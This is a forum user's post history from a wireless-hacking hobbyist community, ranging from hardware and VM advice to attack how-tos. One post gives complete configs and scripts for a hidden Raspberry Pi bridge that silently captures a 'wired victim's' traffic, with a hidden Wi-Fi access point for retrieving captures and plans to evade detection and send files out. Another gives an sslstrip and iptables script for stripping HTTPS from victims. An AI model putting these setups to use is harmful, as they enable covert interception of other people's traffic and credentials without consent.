Jump to content

telot

Dedicated Members
  • Posts

    803
  • Joined

  • Last visited

  • Days Won

    12

Posts posted by telot

  1. 1) Likely. Only red flag for me is the mobile versions usb devices. It depends how much amperage your usb hub is provided and thereby providing. Having two radios receiving/transmitting could cause intermittent issues if there is not enough power for the both of them.

    2) Yes. Ethernet cable to PC. See Darren's wifi pineapple book for setting up the proper settings. You do not need POE. Power the AP1221U separately and connect your pc to the POE/LAN plug.

    3) I'd do the pineapple myself. Remember when someone first broadcasts the ssid's of known networks they're looking for, its the strongest signal that wins.

    4) No clue. I'd buy the one from the hakshop to be sure (and also support the team that made all this possible!).

    telot

  2. Mr-Protocol: For sure. I'm still waiting with bated breath for Seb to release a new firmware with interceptor support (its been talked about since the mark4 came out, but I'm still hopeful).

    inTheDMZ: I got Karma going as well on a previous project with the pi - digininja's guide was pretty easy to follow. I decided to go with the NHA for my pi-karma as well as this interceptor version. The card is just robust and awesome and wireless-N. I've left Karma off this build so far, because I ran out of time, and I'm not sure its a feature that everyone would want with a device like this. Karma is something that a good (or even semi-good) sysadmin would notice over time, and bringing attention to your wireless/wired network tap is probably not a good idea. Regardless, I'll still build it in so the option is there for people.

    Cheers

    telot

  3. The Interceptor has long been kind of a dead project. It makes sense too. The fon+, the hardware Robin Wood originally wrote his interceptor code for is way past EOL, hard to find, and under-featured given the current landscape of embedded/SOC offerings. By borrowing some of irongeek's raspberry pi recipes, and adding in some pi-point, I was able to get very similar functionality out of my raspberry pi. Heres how.

    Hardware:

    Raspberry Pi Model B

    32GB SD Card

    Belkin 4 port powered USB hub

    Alfa wifi card (NHA, from the hakshop)

    USB Ethernet adapter (also from the hakshop)

    OS:

    Latest image of rasbian

    Software: All can be apt-get installed

    bridge-utils

    tcpdump

    hostapd

    fkill

    hostapd

    zd1211-firmware

    hostap-utils

    iw

    dnsmasq

    Edit /etc/network/interfaces to look like this:

    auto lo
    iface lo inet loopback
    iface eth0 inet dhcp
    iface wlan0 inet static
    address 192.168.0.1
    netmask 255.255.255.0

    Edit /etc/dnsmasq.conf

    # Never forward plain names (without a dot or domain part)
    domain-needed
    
    # Only listen for DHCP on wlan0
    interface=wlan0
    
    # Create a dhcp range on your /24 wlan0 network with 12 hour lease time
    dhcp-range=192.168.0.5,192.168.0.254,255.255.255.0,12h

    Edit /etc/hostapd/hostapd.conf (notice it is wpa with the preshared key at /etc/hostapd-psk - the ssid is also hidden)

    interface=wlan0
    driver=nl80211
    ssid=monkey
    channel=1
    auth_algs=1
    wpa=1
    wpa_psk_file=/etc/hostapd-psk
    wpa_key_mgmt=WPA-PSK
    wpa_pairwise=CCMP TKIP
    rsn_pairwise=CCMP
    ignore_broadcast_ssid=1

    Next Create/edit /etc/hostapd-psk

    00:00:00:00:00:00 YourSuperLongAndSecurePasswd

    We're all set! Below you'll see my script for the intercepting portion of the monkey. Feel free to put it in /etc/rc.local to make it run on boot up.

    #!/bin/bash
    #Change settings below to match network
    eth_ip="192.168.1.199"
    eth_netmask="255.255.255.0"
    eth_broadcast="192.168.1.255"
    
    brctl addbr mybridge
    brctl addif mybridge eth0
    brctl addif mybridge eth1
    ifconfig eth0 0.0.0.0 promisc up
    ifconfig eth1 0.0.0.0 promisc up
    ifconfig mybridge promisc up
    ifconfig mybridge $eth_ip netmask $eth_netmask broadcast $eth_broadcast
    tcpdump -i eth1 -w /root/cap.pcap &

    And here is my script for the wifi access point portion of the monkey, again you can put it in rc.local

    # turn on forwarding
    echo 1 > /proc/sys/net/ipv4/ip_forward
    
    # enable NAT
    iptables -t nat -A POSTROUTING -j MASQUERADE
    
    # start the access point
    hostapd -B /etc/hostapd/hostapd.conf

    Now you're passing along all wired traffic to and from your wired victim, all whilst capturing every packet that goes by. You can then surreptitiously nab the pcap via the hidden wifi AP.

    What it doesn't do:

    Unlike the interceptor, it doesn't clone the traffic and pipe it over wifi and/or vpn. It merely captures the traffic and stores it for later retrieval. This was necessary with the original fon+, because there was no usb port, and only a dozen or so MB of storage. Now with USB and storage cheaper than ever, you can store days/weeks/months of captures if you want.

    Things to add:

    -Cronjob that will only turn on the wifi at certain times such as after business hours. That way no employee who happens to be chilling with airodump-ng running notices anything odd.

    -Cronjob that changes the wifi card from master mode to managed and connects to a wifi access point as a client to securely send the cap files. In doing so you could also send an email/upload a status file.

    -Add Jasegar functionality to the wifi AP (this ones the biggy)

    -Add the all important sslstrip functionality (something I've tried but can't get to work - if theres interest, I'll happily share my findings)

    -Add in Moriarty's awesome new UWUI

    So thats it! I've been testing this for the last several hours and it works great. Hope you guys find this interesting enough to give it a try yourself and post your experience here.

    Long live the interceptor monkey!

    telot

  4. You're looking for the interceptor. See the hak5 video on it. Unfortunately the hardware is hard to find these days (fon+). Irongeek has some how-tos on his site on using a raspberry pi, which is the direction I would recommend if you've got one handy.

    Otherwise the wifipineapple mark4 should be able to be used as such, but it will cease to act as a pineapple as far as I can tell, and instead be more like an interceptor. This has not been done before, so it will be likely cause headaches, but whats awesome is you can share what you learn with the community and get mad bonus points!

    telot

  5. Not all the tools are available in apt. Many of them are, but not all (metasploit for example). BT is so popular because they've got all the dependencies, done all the tweaking, and worked through all the bugs for you. Its ready to roll, with nearly every tool available.

    BT is based on Ubuntu, as you mentioned, so there is certainly nothing stopping you from loading what tools you'd like into Ubuntu. I certainly don't need every tool in backtrack, so I just pick and choose what I'm interested in. That said, I always keep a live disk and Backtrack VM's around just in case.

    telot

  6. You are quite welcome skrite

    In order to have backtrack see the alfa, you forward USB devices to the guest OS. Each virtualization suite will handle this differently, but they all have the feature.

    To get a proper IP from your router (not NAT via your host) to the VM - simply setup bridge mode (at least thats what its called in virtualbox) for your VM. That way you can scan as if you're on the network, just as your mba is.

    telot

  7. As a fellow mba owner, I can understand why ubuntu (or windows) dual booting is not ideal. OSX is highly optimized for apples hardware and vice versa. You sacrifice battery life and oftentimes driver efficiency by booting into anything but OSX. Its a tradeoff that 90% of consumers never have to deal with, as they just stay in OSX full time. With that in mind, I would recommend going with a virtual machine of backtrack or ubuntu if you need the tools, but for the most part I just do like you were saying and use the terminal and wireshark in OSX.

    The other downside to going with apple, is it doesn't work great with the pineapples ICS (as you saw from the link from an inebriated Mr-Protocol), but it is workable.

    These are all tradeoffs we have to make in order to enjoy a great, if not the greatest, laptop.

    telot

  8. DrDinosaur - I believe Darren was using mdk3 for his occupineapple stuff. I can't really remember the details, but I'm a command line guy myself, so if you ssh into the pineapple, you can use these commands:

    opkg update

    opkg install mdk3

    Then run the various mdk3 commands that Darren uses for the spoofing of list of fake SSID's.

    pr0l3 - Have you read the pineapple book? See the pinned thread on these forums. If you're still having trouble, start a new thread and give all the details you can and I'm sure we'll be happy to help.

    telot

  9. Is there a reason you want to run all those separately? I'd take a look at running these alternate OS's in virtual machines. If you get the ODD adapter you're talking about, put the 500GB in there and then buy a SSD for your main OS, of which I'd recommend windows or a well suited distro of linux (not backtrack). Also throw in an 8GB stick of ram (super cheap) and you're set. Running backtrack and windows 7 at the same time, each with 2GB of ram, each pulling as much space as they want from the big old 500GB - all while leaving you with the same 4GB of ram you have now plus a new screaming SSD for your host OS. Theres lots of advantages to this such as snapshots, not constantly rebooting to get into another OS, you can setup vlan's between your "victim" and "attacker" so you won't accidentally hack your roommates, etc.

    telot

  10. wychwood: Welcome to the pineapple community! We're always glad to have another pineappler added to our ranks.

    Here is a link for a powered usb hub that I and other heavy users utilize everyday with great success:

    http://www.newegg.com/Product/Product.aspx?Item=N82E16817394106&Tpk=F5U404PBLK

    Perhaps the next iteration of pineapple hardware can be even more specialized and offer us 2 or 3 over-spec-powered usb ports...

    telot

  11. Hello all

    I've been playing with my pineapple and my newly created raspberry pi running karma (all hail digininja!). Normally I test my karma'ing with my trusty "victim" laptop, but this time I decided to use my ipad instead. I couldn't help but notice that when I have sslstrip running, few apps are able to load, and when they do, there is usually some erratic behavior in the app. Either they sit and spin (loading animation) or just straight up fail (...Please check your network connection) or other bizarre behavior (facebook app on iphone says I have no friends when I goto my News Feed). This to me is quite the red flag raised to the vast majority of real world victims, who unless you're targeting a specific persons laptop with white/black lists, will no doubt be using a smartphone/tablet. With the proliferation of "post-pc" mobile devices, the lack of internet-connected-app support does not bode well for those of us who enjoy the benefits of sslstrip.

    Anyone have any ideas on how I can fix this? It must be something in my sslstrip preparations/command that I can change right? Here is my usual "dump 'n strip" script that I run via wps button press.

    
    
    #!/bin/sh
    tcpdump -i eth0 -w /usb/cap.pcap -n net 172.16.42.0/24 &
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
    iptables -t nat -A PREROUTING -p tcp --destination-port 443 -j REDIRECT --to-ports 10000
    sslstrip -w /usb/sslstrip.log &
    

    I know, the port 80 to 10000 is weird, but thats what was in the how-to sslstrip forum post and I've been using this script for 6 months and it works fabulous otherwise. Any help is much appreciated fellas, as always!

    telot

  12. Parity: I recently learned about this by way of Security Onion. I needed a way to sniff all my traffic in order to run snort and snorby and all these awesome intrusion detection tools (which work best by sniffing the entire networks traffic). For the most part, yes, you'll find these "span" ports on commercial, industry grade switches (mega $$$) but there is a cheap alternative. The company is kind of no-name (Mikrotik), but the product is totally sound. I've been using it for months and it works as advertised without fail.

    http://www.roc-noc.c...rd/rb250gs.html

    TheKingUnderTheHill: Another option is to sneak a passive lan tap in there. You can buy one of the two available on the hakshop, or you can build your own quite easily with some spare cat5 cable and some female ends, which you can pick up at home depot...hehe pick up some females at home depot...

    telot

  13. The way that I know is by using Airbase-ng - a tool found in the aircrack-ng suite. Vivek has some videos on using airbase in his wifi megaprimer on securitytube.net. Theres pros and cons to using airbase over the pineapple (i.e. you can capture a wpa handshake with airbase). As cool as airbase is, I must warn you - its not nearly as slick as the pineapple is. Theres a lot of benefit to using specialized hardware for this task. As an example, you have to configure your own DHCP server if you want to use airbase effectively, whereas the pineapple of course is essentially all plug and play.

    Since Mr. P didn't really answer this aspect of your question: the fon is another kind of wifi router that the karma/jasager was originally developed for by Mr. Robin Wood (aka digininja). Just google fon router and you'll find all the info you need about it.

    Good Luck!

    telot

  14. Honestly, a wifipineapple might be a decent way to start. Its a great platform for getting your head around networking in general, sniffing traffic, deauthing (taking down an access point), phishing, and pranks. Watch the episodes on it and pour through the forums and wiki. Go back and read some old forums posts with lots of views and replies to see what problems and questions people have had.

    telot

  15. odroid x2 might give you the oomph you're looking for petertfm, though multiple core support would be a must to get max benefit from it...

    http://www.hardkernel.com/renewal_2011/products/prdt_info.php?g_code=G135235611947

    The pi would be a good replacement as well - I've been using pwnpi to run my pineapple for months now and it works great. Use the pi when I need some horsepower (msf and set...though msf is pretty slow still) and use the pineapple soley for karmaing stripping and dumping.


    Either way, this UI is looking sicker and sicker - can we get some instructions for use on the pineapple Moriarty? I'm sure I can get it going, but with all this rummed up eggnog, I think getting step by step instructions would be most appreciated! lol




    telot

×
×
  • Create New...